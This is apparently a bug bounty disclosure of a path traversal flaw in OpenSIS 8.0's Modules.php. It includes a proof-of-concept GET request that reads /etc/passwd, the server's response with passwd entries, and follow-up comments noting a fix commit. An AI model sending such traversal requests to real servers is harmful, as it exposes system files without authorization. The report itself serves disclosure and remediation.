Path Traversal in os4ed/opensis-classic

Valid

Reported on

Aug 28th 2021

✍️ Description

The module.php modname parameter in OpenSIS 8.0 is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.;

🕵️‍♂️ Proof of Concept

//  Modules.php
GET /Modules.php?modname=../../../../../../../../../../../../../../../../etc/passwd
HTTP/1.1 302 Found
Location: index.php

                <!-- Main content -->
                <div class="content-wrapper"><div id='content' name='content' class='clearfix'><div id='update_panel'><div id='divErr' class="text-left text-danger"></div><DIV id="Migoicons" style="visibility:hidden;position:absolute;z-index:1000;top:-100;"></DIV>root:x:0:0:root:/root:/usr/bin/zsh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
</div><div id='cal' style='position:absolute;'></div></div>
    </div>
        </div>
        </div>
                <!-- /main content -->

💥 Impact

Enables an attacker to access sensitive files

Occurrences

Modules.php L954-L976

Z-Old

commented 2 years ago

Admin

Hey N, please confirm your production openSIS URL (localhost, IP address or fake URLs are discouraged).

We have contacted a member of the os4ed/opensis-classic team and are waiting to hear back 2 years ago

We have sent a second follow up to the os4ed/opensis-classic team. We will try again in 10 days. 2 years ago

We have sent a third and final follow up to the os4ed/opensis-classic team. This report is now considered stale. 2 years ago

commented a year ago

Researcher

@admin Good Day - This was fixed under https://github.com/OS4ED/openSIS-Classic/commit/a2d617977fa159185263845ac75b8c83cddd07f0#diff-122b22cacc5d5ac0e1a9928563c6187f2edae3f7b33035cea6fe34d8a07ef309 -- Would you please be able to manually validate? Thank you